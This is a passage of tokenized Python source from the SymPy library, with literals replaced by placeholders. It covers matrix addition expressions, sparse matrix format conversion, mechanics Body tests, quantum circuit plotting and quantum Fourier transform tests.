<EOL> u *= DE . t ** e <EOL> elif case == '<STR_LIT>' : <EOL> with DecrementLevel ( DE ) : <EOL> pa , pd = frac_in ( p , DE . t ) <EOL> A = is_log_deriv_k_t_radical_in_field ( pa , pd , DE , case = '<STR_LIT>' ) <EOL> if A is None : <EOL> return None <EOL> n , u = A <EOL> elif case == '<STR_LIT>' : <EOL> if not fd . is_sqf or fa . degree ( ) >= fd . degree ( ) : <EOL> return None <EOL> n = reduce ( ilcm , [ i . as_numer_denom ( ) [ <NUM_LIT:1> ] for _ , i in residueterms ] , S ( <NUM_LIT:1> ) ) <EOL> u = Mul ( * [ Pow ( i , j * n ) for i , j in residueterms ] ) <EOL> return ( n , u ) <EOL> elif case == '<STR_LIT>' : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif case in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise ValueError ( "<STR_LIT>" % case ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % case ) <EOL> common_denom = reduce ( ilcm , [ i . as_numer_denom ( ) [ <NUM_LIT:1> ] for i in [ j for _ , j in <EOL> residueterms ] ] + [ n ] , S ( <NUM_LIT:1> ) ) <EOL> residueterms = [ ( i , j * common_denom ) for i , j in residueterms ] <EOL> m = common_denom // n <EOL> if common_denom != n * m : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> u = cancel ( u ** m * Mul ( * [ Pow ( i , j ) for i , j in residueterms ] ) ) <EOL> return ( common_denom , u ) </s>
<s> from __future__ import print_function , division <EOL> from sympy . core . compatibility import reduce <EOL> from operator import add <EOL> from sympy . core import Add , Basic , sympify <EOL> from sympy . functions import adjoint <EOL> from sympy . matrices . matrices import MatrixBase <EOL> from sympy . matrices . expressions . transpose import transpose <EOL> from sympy . strategies import ( rm_id , unpack , flatten , sort , condition , <EOL> exhaust , do_one , glom ) <EOL> from sympy . matrices . expressions . matexpr import MatrixExpr , ShapeError , ZeroMatrix <EOL> from sympy . utilities import default_sort_key , sift <EOL> class MatAdd ( MatrixExpr ) : <EOL> """<STR_LIT>""" <EOL> is_MatAdd = True <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> args = list ( map ( sympify , args ) ) <EOL> check = kwargs . get ( '<STR_LIT>' , True ) <EOL> obj = Basic . __new__ ( cls , * args ) <EOL> if check : <EOL> validate ( * args ) <EOL> return obj <EOL> @ property <EOL> def shape ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] . shape <EOL> def _entry ( self , i , j ) : <EOL> return Add ( * [ arg . _entry ( i , j ) for arg in self . args ] ) <EOL> def _eval_transpose ( self ) : <EOL> return MatAdd ( * [ transpose ( arg ) for arg in self . args ] ) . doit ( ) <EOL> def _eval_adjoint ( self ) : <EOL> return MatAdd ( * [ adjoint ( arg ) for arg in self . args ] ) . doit ( ) <EOL> def _eval_trace ( self ) : <EOL> from . trace import trace <EOL> return Add ( * [ trace ( arg ) for arg in self . args ] ) . doit ( ) <EOL> def doit ( self , ** kwargs ) : <EOL> deep = kwargs . get ( '<STR_LIT>' , True ) <EOL> if deep : <EOL> args = [ arg . doit ( ** kwargs ) for arg in self . args ] <EOL> else : <EOL> args = self . args <EOL> return canonicalize ( MatAdd ( * args ) ) <EOL> def validate ( * args ) : <EOL> if not all ( arg . is_Matrix for arg in args ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> A = args [ <NUM_LIT:0> ] <EOL> for B in args [ <NUM_LIT:1> : ] : <EOL> if A . shape != B . shape : <EOL> raise ShapeError ( "<STR_LIT>" % ( A , B ) ) <EOL> factor_of = lambda arg : arg . as_coeff_mmul ( ) [ <NUM_LIT:0> ] <EOL> matrix_of = lambda arg : unpack ( arg . as_coeff_mmul ( ) [ <NUM_LIT:1> ] ) <EOL> def combine ( cnt , mat ) : <EOL> if cnt == <NUM_LIT:1> : <EOL> return mat <EOL> else : <EOL> return cnt * mat <EOL> def merge_explicit ( matadd ) : <EOL> """<STR_LIT>""" <EOL> groups = sift ( matadd . args , lambda arg : isinstance ( arg , MatrixBase ) ) <EOL> if len ( groups [ True ] ) > <NUM_LIT:1> : <EOL> return MatAdd ( * ( groups [ False ] + [ reduce ( add , groups [ True ] ) ] ) ) <EOL> else : <EOL> return matadd <EOL> rules = ( rm_id ( lambda x : x == <NUM_LIT:0> or isinstance ( x , ZeroMatrix ) ) , <EOL> unpack , <EOL> flatten , <EOL> glom ( matrix_of , factor_of , combine ) , <EOL> merge_explicit , <EOL> sort ( default_sort_key ) ) <EOL> canonicalize = exhaust ( condition ( lambda x : isinstance ( x , MatAdd ) , <EOL> do_one ( * rules ) ) ) </s>
<s> from __future__ import print_function , division <EOL> from sympy . core . compatibility import range <EOL> from sympy import SparseMatrix <EOL> def _doktocsr ( dok ) : <EOL> """<STR_LIT>""" <EOL> row , JA , A = [ list ( i ) for i in zip ( * dok . row_list ( ) ) ] <EOL> IA = [ <NUM_LIT:0> ] * ( ( row [ <NUM_LIT:0> ] if row else <NUM_LIT:0> ) + <NUM_LIT:1> ) <EOL> for i , r in enumerate ( row ) : <EOL> IA . extend ( [ i ] * ( r - row [ i - <NUM_LIT:1> ] ) ) <EOL> IA . extend ( [ len ( A ) ] * ( dok . rows - len ( IA ) + <NUM_LIT:1> ) ) <EOL> shape = [ dok . rows , dok . cols ] <EOL> return [ A , JA , IA , shape ] <EOL> def _csrtodok ( csr ) : <EOL> """<STR_LIT>""" <EOL> smat = { } <EOL> A , JA , IA , shape = csr <EOL> for i in range ( len ( IA ) - <NUM_LIT:1> ) : <EOL> indices = slice ( IA [ i ] , IA [ i + <NUM_LIT:1> ] ) <EOL> for l , m in zip ( A [ indices ] , JA [ indices ] ) : <EOL> smat [ i , m ] = l <EOL> return SparseMatrix ( * ( shape + [ smat ] ) ) </s>
<s> from sympy . core . compatibility import range <EOL> from sympy . ntheory import npartitions <EOL> def test_partitions ( ) : <EOL> assert [ npartitions ( k ) for k in range ( <NUM_LIT> ) ] == [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> assert npartitions ( <NUM_LIT:100> ) == <NUM_LIT> <EOL> assert npartitions ( <NUM_LIT:200> ) == <NUM_LIT> <EOL> assert npartitions ( <NUM_LIT:1000> ) == <NUM_LIT> <EOL> assert npartitions ( <NUM_LIT> ) == <NUM_LIT> <EOL> assert npartitions ( <NUM_LIT> ) % <NUM_LIT:10> ** <NUM_LIT:10> == <NUM_LIT> <EOL> assert npartitions ( <NUM_LIT> ) % <NUM_LIT:10> ** <NUM_LIT:10> == <NUM_LIT> </s>
<s> from sympy import Symbol , symbols <EOL> from sympy . physics . vector import Point , ReferenceFrame <EOL> from sympy . physics . mechanics import inertia , Body <EOL> from sympy . utilities . pytest import raises <EOL> def test_default ( ) : <EOL> body = Body ( '<STR_LIT:body>' ) <EOL> assert body . name == '<STR_LIT:body>' <EOL> assert body . loads == [ ] <EOL> point = Point ( '<STR_LIT>' ) <EOL> point . set_vel ( body . frame , <NUM_LIT:0> ) <EOL> com = body . masscenter <EOL> frame = body . frame <EOL> assert com . vel ( frame ) == point . vel ( frame ) <EOL> assert body . mass == Symbol ( '<STR_LIT>' ) <EOL> ixx , iyy , izz = symbols ( '<STR_LIT>' ) <EOL> ixy , iyz , izx = symbols ( '<STR_LIT>' ) <EOL> assert body . inertia == ( inertia ( body . frame , ixx , iyy , izz , ixy , iyz , izx ) , <EOL> body . masscenter ) <EOL> def test_custom_rigid_body ( ) : <EOL> rigidbody_masscenter = Point ( '<STR_LIT>' ) <EOL> rigidbody_mass = Symbol ( '<STR_LIT>' ) <EOL> rigidbody_frame = ReferenceFrame ( '<STR_LIT>' ) <EOL> body_inertia = inertia ( rigidbody_frame , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> rigid_body = Body ( '<STR_LIT>' , rigidbody_masscenter , rigidbody_mass , <EOL> rigidbody_frame , body_inertia ) <EOL> com = rigid_body . masscenter <EOL> frame = rigid_body . frame <EOL> rigidbody_masscenter . set_vel ( rigidbody_frame , <NUM_LIT:0> ) <EOL> assert com . vel ( frame ) == rigidbody_masscenter . vel ( frame ) <EOL> assert com . pos_from ( com ) == rigidbody_masscenter . pos_from ( com ) <EOL> assert rigid_body . mass == rigidbody_mass <EOL> assert rigid_body . inertia == ( body_inertia , rigidbody_masscenter ) <EOL> assert hasattr ( rigid_body , '<STR_LIT>' ) <EOL> assert hasattr ( rigid_body , '<STR_LIT>' ) <EOL> assert hasattr ( rigid_body , '<STR_LIT>' ) <EOL> assert hasattr ( rigid_body , '<STR_LIT>' ) <EOL> def test_particle_body ( ) : <EOL> particle_masscenter = Point ( '<STR_LIT>' ) <EOL> particle_mass = Symbol ( '<STR_LIT>' ) <EOL> particle_frame = ReferenceFrame ( '<STR_LIT>' ) <EOL> particle_body = Body ( '<STR_LIT>' , particle_masscenter , particle_mass , <EOL> particle_frame ) <EOL> com = particle_body . masscenter <EOL> frame = particle_body . frame <EOL> particle_masscenter . set_vel ( particle_frame , <NUM_LIT:0> ) <EOL> assert com . vel ( frame ) == particle_masscenter . vel ( frame ) <EOL> assert com . pos_from ( com ) == particle_masscenter . pos_from ( com ) <EOL> assert particle_body . mass == particle_mass <EOL> assert not hasattr ( particle_body , "<STR_LIT>" ) <EOL> assert hasattr ( particle_body , '<STR_LIT>' ) <EOL> assert hasattr ( particle_body , '<STR_LIT>' ) <EOL> assert hasattr ( particle_body , '<STR_LIT>' ) <EOL> def test_particle_body_add_force ( ) : <EOL> particle_masscenter = Point ( '<STR_LIT>' ) <EOL> particle_mass = Symbol ( '<STR_LIT>' ) <EOL> particle_frame = ReferenceFrame ( '<STR_LIT>' ) <EOL> particle_body = Body ( '<STR_LIT>' , particle_masscenter , particle_mass , <EOL> particle_frame ) <EOL> a = Symbol ( '<STR_LIT:a>' ) <EOL> force_vector = a * particle_body . frame . x <EOL> particle_body . apply_force ( force_vector , particle_body . masscenter ) <EOL> assert len ( particle_body . loads ) == <NUM_LIT:1> <EOL> point = particle_body . masscenter . locatenew ( <EOL> particle_body . _name + '<STR_LIT>' , <NUM_LIT:0> ) <EOL> point . set_vel ( particle_body . frame , <NUM_LIT:0> ) <EOL> force_point = particle_body . loads [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> frame = particle_body . frame <EOL> assert force_point . vel ( frame ) == point . vel ( frame ) <EOL> assert force_point . pos_from ( force_point ) == point . pos_from ( force_point ) <EOL> assert particle_body . loads [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] == force_vector <EOL> def test_body_add_force ( ) : <EOL> rigidbody_masscenter = Point ( '<STR_LIT>' ) <EOL> rigidbody_mass = Symbol ( '<STR_LIT>' ) <EOL> rigidbody_frame = ReferenceFrame ( '<STR_LIT>' ) <EOL> body_inertia = inertia ( rigidbody_frame , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> rigid_body = Body ( '<STR_LIT>' , rigidbody_masscenter , rigidbody_mass , <EOL> rigidbody_frame , body_inertia ) <EOL> l = Symbol ( '<STR_LIT:l>' ) <EOL> Fa = Symbol ( '<STR_LIT>' ) <EOL> point = rigid_body . masscenter . locatenew ( <EOL> '<STR_LIT>' , <EOL> l * rigid_body . frame . x ) <EOL> point . set_vel ( rigid_body . frame , <NUM_LIT:0> ) <EOL> force_vector = Fa * rigid_body . frame . z <EOL> rigid_body . apply_force ( force_vector , point ) <EOL> assert len ( rigid_body . loads ) == <NUM_LIT:1> <EOL> force_point = rigid_body . loads [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> frame = rigid_body . frame <EOL> assert force_point . vel ( frame ) == point . vel ( frame ) <EOL> assert force_point . pos_from ( force_point ) == point . pos_from ( force_point ) <EOL> assert rigid_body . loads [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] == force_vector <EOL> rigid_body . apply_force ( force_vector ) <EOL> assert len ( rigid_body . loads ) == <NUM_LIT:2> <EOL> assert rigid_body . loads [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] == force_vector <EOL> raises ( TypeError , lambda : rigid_body . apply_force ( force_vector , <NUM_LIT:0> ) ) <EOL> raises ( TypeError , lambda : rigid_body . apply_force ( <NUM_LIT:0> ) ) <EOL> def test_body_add_torque ( ) : <EOL> body = Body ( '<STR_LIT:body>' ) <EOL> torque_vector = body . frame . x <EOL> body . apply_torque ( torque_vector ) <EOL> assert len ( body . loads ) == <NUM_LIT:1> <EOL> assert body . loads [ <NUM_LIT:0> ] == ( body . frame , torque_vector ) <EOL> raises ( TypeError , lambda : body . apply_torque ( <NUM_LIT:0> ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy import Mul <EOL> from sympy . core . compatibility import u , range <EOL> from sympy . external import import_module <EOL> from sympy . physics . quantum . gate import Gate , OneQubitGate , CGate , CGateS <EOL> from sympy . core . core import BasicMeta <EOL> from sympy . core . assumptions import ManagedProperties <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> np = import_module ( '<STR_LIT>' ) <EOL> matplotlib = import_module ( <EOL> '<STR_LIT>' , __import__kwargs = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> catch = ( RuntimeError , ) ) <EOL> if not np or not matplotlib : <EOL> class CircuitPlot ( object ) : <EOL> def __init__ ( * args , ** kwargs ) : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> def circuit_plot ( * args , ** kwargs ) : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> else : <EOL> pyplot = matplotlib . pyplot <EOL> Line2D = matplotlib . lines . Line2D <EOL> Circle = matplotlib . patches . Circle <EOL> class CircuitPlot ( object ) : <EOL> """<STR_LIT>""" <EOL> scale = <NUM_LIT:1.0> <EOL> fontsize = <NUM_LIT> <EOL> linewidth = <NUM_LIT:1.0> <EOL> control_radius = <NUM_LIT> <EOL> not_radius = <NUM_LIT> <EOL> swap_delta = <NUM_LIT> <EOL> labels = [ ] <EOL> inits = { } <EOL> label_buffer = <NUM_LIT:0.5> <EOL> def __init__ ( self , c , nqubits , ** kwargs ) : <EOL> self . circuit = c <EOL> self . ngates = len ( self . circuit . args ) <EOL> self . nqubits = nqubits <EOL> self . update ( kwargs ) <EOL> self . _create_grid ( ) <EOL> self . _create_figure ( ) <EOL> self . _plot_wires ( ) <EOL> self . _plot_gates ( ) <EOL> self . _finish ( ) <EOL> def update ( self , kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( kwargs ) <EOL> def _create_grid ( self ) : <EOL> """<STR_LIT>""" <EOL> scale = self . scale <EOL> wire_grid = np . arange ( <NUM_LIT:0.0> , self . nqubits * scale , scale , dtype = float ) <EOL> gate_grid = np . arange ( <NUM_LIT:0.0> , self . ngates * scale , scale , dtype = float ) <EOL> self . _wire_grid = wire_grid <EOL> self . _gate_grid = gate_grid <EOL> def _create_figure ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _figure = pyplot . figure ( <EOL> figsize = ( self . ngates * self . scale , self . nqubits * self . scale ) , <EOL> facecolor = '<STR_LIT:w>' , <EOL> edgecolor = '<STR_LIT:w>' <EOL> ) <EOL> ax = self . _figure . add_subplot ( <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <EOL> frameon = True <EOL> ) <EOL> ax . set_axis_off ( ) <EOL> offset = <NUM_LIT:0.5> * self . scale <EOL> ax . set_xlim ( self . _gate_grid [ <NUM_LIT:0> ] - offset , self . _gate_grid [ - <NUM_LIT:1> ] + offset ) <EOL> ax . set_ylim ( self . _wire_grid [ <NUM_LIT:0> ] - offset , self . _wire_grid [ - <NUM_LIT:1> ] + offset ) <EOL> ax . set_aspect ( '<STR_LIT>' ) <EOL> self . _axes = ax <EOL> def _plot_wires ( self ) : <EOL> """<STR_LIT>""" <EOL> xstart = self . _gate_grid [ <NUM_LIT:0> ] <EOL> xstop = self . _gate_grid [ - <NUM_LIT:1> ] <EOL> xdata = ( xstart - self . scale , xstop + self . scale ) <EOL> for i in range ( self . nqubits ) : <EOL> ydata = ( self . _wire_grid [ i ] , self . _wire_grid [ i ] ) <EOL> line = Line2D ( <EOL> xdata , ydata , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_line ( line ) <EOL> if self . labels : <EOL> init_label_buffer = <NUM_LIT:0> <EOL> if self . inits . get ( self . labels [ i ] ) : init_label_buffer = <NUM_LIT> <EOL> self . _axes . text ( <EOL> xdata [ <NUM_LIT:0> ] - self . label_buffer - init_label_buffer , ydata [ <NUM_LIT:0> ] , <EOL> render_label ( self . labels [ i ] , self . inits ) , <EOL> size = self . fontsize , <EOL> color = '<STR_LIT:k>' , ha = '<STR_LIT>' , va = '<STR_LIT>' ) <EOL> self . _plot_measured_wires ( ) <EOL> def _plot_measured_wires ( self ) : <EOL> ismeasured = self . _measurements ( ) <EOL> xstop = self . _gate_grid [ - <NUM_LIT:1> ] <EOL> dy = <NUM_LIT> <EOL> for im in ismeasured : <EOL> xdata = ( self . _gate_grid [ ismeasured [ im ] ] , xstop + self . scale ) <EOL> ydata = ( self . _wire_grid [ im ] + dy , self . _wire_grid [ im ] + dy ) <EOL> line = Line2D ( <EOL> xdata , ydata , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_line ( line ) <EOL> for i , g in enumerate ( self . _gates ( ) ) : <EOL> if isinstance ( g , CGate ) or isinstance ( g , CGateS ) : <EOL> wires = g . controls + g . targets <EOL> for wire in wires : <EOL> if wire in ismeasured and self . _gate_grid [ i ] > self . _gate_grid [ ismeasured [ wire ] ] : <EOL> ydata = min ( wires ) , max ( wires ) <EOL> xdata = self . _gate_grid [ i ] - dy , self . _gate_grid [ i ] - dy <EOL> line = Line2D ( <EOL> xdata , ydata , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_line ( line ) <EOL> def _gates ( self ) : <EOL> """<STR_LIT>""" <EOL> gates = [ ] <EOL> if isinstance ( self . circuit , Mul ) : <EOL> for g in reversed ( self . circuit . args ) : <EOL> if isinstance ( g , Gate ) : <EOL> gates . append ( g ) <EOL> elif isinstance ( self . circuit , Gate ) : <EOL> gates . append ( self . circuit ) <EOL> return gates <EOL> def _plot_gates ( self ) : <EOL> """<STR_LIT>""" <EOL> for i , gate in enumerate ( self . _gates ( ) ) : <EOL> gate . plot_gate ( self , i ) <EOL> def _measurements ( self ) : <EOL> """<STR_LIT>""" <EOL> ismeasured = { } <EOL> for i , g in enumerate ( self . _gates ( ) ) : <EOL> if getattr ( g , '<STR_LIT>' , False ) : <EOL> for target in g . targets : <EOL> if target in ismeasured : <EOL> if ismeasured [ target ] > i : <EOL> ismeasured [ target ] = i <EOL> else : <EOL> ismeasured [ target ] = i <EOL> return ismeasured <EOL> def _finish ( self ) : <EOL> for o in self . _figure . findobj ( ) : <EOL> o . set_clip_on ( False ) <EOL> def one_qubit_box ( self , t , gate_idx , wire_idx ) : <EOL> """<STR_LIT>""" <EOL> x = self . _gate_grid [ gate_idx ] <EOL> y = self . _wire_grid [ wire_idx ] <EOL> self . _axes . text ( <EOL> x , y , t , <EOL> color = '<STR_LIT:k>' , <EOL> ha = '<STR_LIT>' , <EOL> va = '<STR_LIT>' , <EOL> bbox = dict ( ec = '<STR_LIT:k>' , fc = '<STR_LIT:w>' , fill = True , lw = self . linewidth ) , <EOL> size = self . fontsize <EOL> ) <EOL> def two_qubit_box ( self , t , gate_idx , wire_idx ) : <EOL> """<STR_LIT>""" <EOL> x = self . _gate_grid [ gate_idx ] <EOL> y = self . _wire_grid [ wire_idx ] + <NUM_LIT:0.5> <EOL> print ( self . _gate_grid ) <EOL> print ( self . _wire_grid ) <EOL> obj = self . _axes . text ( <EOL> x , y , t , <EOL> color = '<STR_LIT:k>' , <EOL> ha = '<STR_LIT>' , <EOL> va = '<STR_LIT>' , <EOL> bbox = dict ( ec = '<STR_LIT:k>' , fc = '<STR_LIT:w>' , fill = True , lw = self . linewidth ) , <EOL> size = self . fontsize <EOL> ) <EOL> def control_line ( self , gate_idx , min_wire , max_wire ) : <EOL> """<STR_LIT>""" <EOL> xdata = ( self . _gate_grid [ gate_idx ] , self . _gate_grid [ gate_idx ] ) <EOL> ydata = ( self . _wire_grid [ min_wire ] , self . _wire_grid [ max_wire ] ) <EOL> line = Line2D ( <EOL> xdata , ydata , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_line ( line ) <EOL> def control_point ( self , gate_idx , wire_idx ) : <EOL> """<STR_LIT>""" <EOL> x = self . _gate_grid [ gate_idx ] <EOL> y = self . _wire_grid [ wire_idx ] <EOL> radius = self . control_radius <EOL> c = Circle ( <EOL> ( x , y ) , <EOL> radius * self . scale , <EOL> ec = '<STR_LIT:k>' , <EOL> fc = '<STR_LIT:k>' , <EOL> fill = True , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_patch ( c ) <EOL> def not_point ( self , gate_idx , wire_idx ) : <EOL> """<STR_LIT>""" <EOL> x = self . _gate_grid [ gate_idx ] <EOL> y = self . _wire_grid [ wire_idx ] <EOL> radius = self . not_radius <EOL> c = Circle ( <EOL> ( x , y ) , <EOL> radius , <EOL> ec = '<STR_LIT:k>' , <EOL> fc = '<STR_LIT:w>' , <EOL> fill = False , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_patch ( c ) <EOL> l = Line2D ( <EOL> ( x , x ) , ( y - radius , y + radius ) , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_line ( l ) <EOL> def swap_point ( self , gate_idx , wire_idx ) : <EOL> """<STR_LIT>""" <EOL> x = self . _gate_grid [ gate_idx ] <EOL> y = self . _wire_grid [ wire_idx ] <EOL> d = self . swap_delta <EOL> l1 = Line2D ( <EOL> ( x - d , x + d ) , <EOL> ( y - d , y + d ) , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> l2 = Line2D ( <EOL> ( x - d , x + d ) , <EOL> ( y + d , y - d ) , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_line ( l1 ) <EOL> self . _axes . add_line ( l2 ) <EOL> def circuit_plot ( c , nqubits , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return CircuitPlot ( c , nqubits , ** kwargs ) <EOL> def render_label ( label , inits = { } ) : <EOL> """<STR_LIT>""" <EOL> init = inits . get ( label ) <EOL> if init : <EOL> return r'<STR_LIT>' % ( label , init ) <EOL> return r'<STR_LIT>' % label <EOL> def labeller ( n , symbol = '<STR_LIT:q>' ) : <EOL> """<STR_LIT>""" <EOL> return [ '<STR_LIT>' % ( symbol , n - i - <NUM_LIT:1> ) for i in range ( n ) ] <EOL> class Mz ( OneQubitGate ) : <EOL> """<STR_LIT>""" <EOL> measurement = True <EOL> gate_name = '<STR_LIT>' <EOL> gate_name_latex = u'<STR_LIT>' <EOL> class Mx ( OneQubitGate ) : <EOL> """<STR_LIT>""" <EOL> measurement = True <EOL> gate_name = '<STR_LIT>' <EOL> gate_name_latex = u'<STR_LIT>' <EOL> class CreateOneQubitGate ( ManagedProperties ) : <EOL> def __new__ ( mcl , name , latexname = None ) : <EOL> if not latexname : <EOL> latexname = name <EOL> return BasicMeta . __new__ ( mcl , name + "<STR_LIT>" , ( OneQubitGate , ) , <EOL> { '<STR_LIT>' : name , '<STR_LIT>' : latexname } ) <EOL> def CreateCGate ( name , latexname = None ) : <EOL> """<STR_LIT>""" <EOL> if not latexname : <EOL> latexname = name <EOL> onequbitgate = CreateOneQubitGate ( name , latexname ) <EOL> def ControlledGate ( ctrls , target ) : <EOL> return CGate ( tuple ( ctrls ) , onequbitgate ( target ) ) <EOL> return ControlledGate </s>
<s> from sympy import exp , I , Matrix , pi , sqrt , Symbol <EOL> from sympy . core . compatibility import range <EOL> from sympy . physics . quantum . qft import QFT , IQFT , RkGate <EOL> from sympy . physics . quantum . gate import ( ZGate , SwapGate , HadamardGate , CGate , <EOL> PhaseGate , TGate ) <EOL> from sympy . physics . quantum . qubit import Qubit <EOL> from sympy . physics . quantum . qapply import qapply <EOL> from sympy . physics . quantum . represent import represent <EOL> def test_RkGate ( ) : <EOL> x = Symbol ( '<STR_LIT:x>' ) <EOL> assert RkGate ( <NUM_LIT:1> , x ) . k == x <EOL> assert RkGate ( <NUM_LIT:1> , x ) . targets == ( <NUM_LIT:1> , ) <EOL> assert RkGate ( <NUM_LIT:1> , <NUM_LIT:1> ) == ZGate ( <NUM_LIT:1> ) <EOL> assert RkGate ( <NUM_LIT:2> , <NUM_LIT:2> ) == PhaseGate ( <NUM_LIT:2> ) <EOL> assert RkGate ( <NUM_LIT:3> , <NUM_LIT:3> ) == TGate ( <NUM_LIT:3> ) <EOL> assert represent ( <EOL> RkGate ( <NUM_LIT:0> , x ) , nqubits = <NUM_LIT:1> ) == Matrix ( [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , exp ( <NUM_LIT:2> * I * pi / <NUM_LIT:2> ** x ) ] ] ) <EOL> def test_quantum_fourier ( ) : <EOL> assert QFT ( <NUM_LIT:0> , <NUM_LIT:3> ) . decompose ( ) == SwapGate ( <NUM_LIT:0> , <NUM_LIT:2> ) * HadamardGate ( <NUM_LIT:0> ) * CGate ( ( <NUM_LIT:0> , ) , PhaseGate ( <NUM_LIT:1> ) ) * HadamardGate ( <NUM_LIT:1> ) * CGate ( ( <NUM_LIT:0> , ) , TGate ( <NUM_LIT:2> ) ) * CGate ( ( <NUM_LIT:1> , ) , PhaseGate ( <NUM_LIT:2> ) ) * HadamardGate ( <NUM_LIT:2> ) <EOL> assert IQFT ( <NUM_LIT:0> , <NUM_LIT:3> ) . decompose ( ) == HadamardGate ( <NUM_LIT:2> ) * CGate ( ( <NUM_LIT:1> , ) , RkGate ( <NUM_LIT:2> , - <NUM_LIT:2> ) ) * CGate ( ( <NUM_LIT:0> , ) , RkGate ( <NUM_LIT:2> , - <NUM_LIT:3> ) ) * HadamardGate ( <NUM_LIT:1> ) * CGate ( ( <NUM_LIT:0> , ) , RkGate ( <NUM_LIT:1> , - <NUM_LIT:2> ) ) * HadamardGate ( <NUM_LIT:0> ) * SwapGate ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> assert represent ( QFT ( <NUM_LIT:0> , <NUM_LIT:3> ) , nqubits = <NUM_LIT:3> ) == Matrix ( [ [ exp ( <NUM_LIT:2> * pi * I / <NUM_LIT:8> ) ** ( i * j % <NUM_LIT:8> ) / sqrt ( <NUM_LIT:8> ) for i in range ( <NUM_LIT:8> ) ] for j in range ( <NUM_LIT:8> ) ] ) <EOL> assert QFT ( <NUM_LIT:0> , <NUM_LIT:4> ) . decompose ( ) <EOL> assert qapply ( QFT ( <NUM_LIT:0> , <NUM_LIT:3> ) . decompose ( ) * Qubit ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ) . expand ( ) == qapply ( <EOL> HadamardGate ( <NUM_LIT:0> ) * HadamardGate ( <NUM_LIT:1> ) * HadamardGate ( <NUM_LIT:2> ) * Qubit ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> ) . expand ( ) <EOL> def test_qft_represent ( ) : <EOL> c = QFT ( <NUM_LIT:0> , <NUM_LIT:3> ) <EOL> a = represent ( c , nqubits = <NUM_LIT:3> ) <EOL> b = represent ( c . decompose ( ) , nqubits = <NUM_LIT:3> ) <EOL> assert a . evalf ( prec = <NUM_LIT:10> ) == b . evalf ( prec = <NUM_LIT:10> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from sympy . physics . unitsystems . dimensions import Dimension , DimensionSystem <EOL> from sympy . physics . unitsystems . units import Unit , Constant , UnitSystem <EOL> from sympy . physics . unitsystems . prefixes import PREFIXES , prefix_unit <EOL> action = Dimension ( name = "<STR_LIT:action>" , symbol = "<STR_LIT:A>" , length = <NUM_LIT:2> , mass = <NUM_LIT:1> , time = - <NUM_LIT:1> ) <EOL> energy = Dimension ( name = "<STR_LIT>" , symbol = "<STR_LIT:E>" , length = <NUM_LIT:2> , mass = <NUM_LIT:1> , time = - <NUM_LIT:2> ) <EOL> velocity = Dimension ( name = "<STR_LIT>" , symbol = "<STR_LIT>" , length = <NUM_LIT:1> , time = - <NUM_LIT:1> ) <EOL> length = Dimension ( name = "<STR_LIT>" , symbol = "<STR_LIT:L>" , length = <NUM_LIT:1> ) <EOL> mass = Dimension ( name = "<STR_LIT>" , symbol = "<STR_LIT:M>" , mass = <NUM_LIT:1> ) <EOL> time = Dimension ( name = "<STR_LIT:time>" , symbol = "<STR_LIT:T>" , time = <NUM_LIT:1> ) <EOL> acceleration = Dimension ( name = "<STR_LIT>" , length = <NUM_LIT:1> , time = - <NUM_LIT:2> ) <EOL> momentum = Dimension ( name = "<STR_LIT>" , mass = <NUM_LIT:1> , length = <NUM_LIT:1> , time = - <NUM_LIT:1> ) <EOL> force = Dimension ( name = "<STR_LIT>" , symbol = "<STR_LIT:F>" , mass = <NUM_LIT:1> , length = <NUM_LIT:1> , time = - 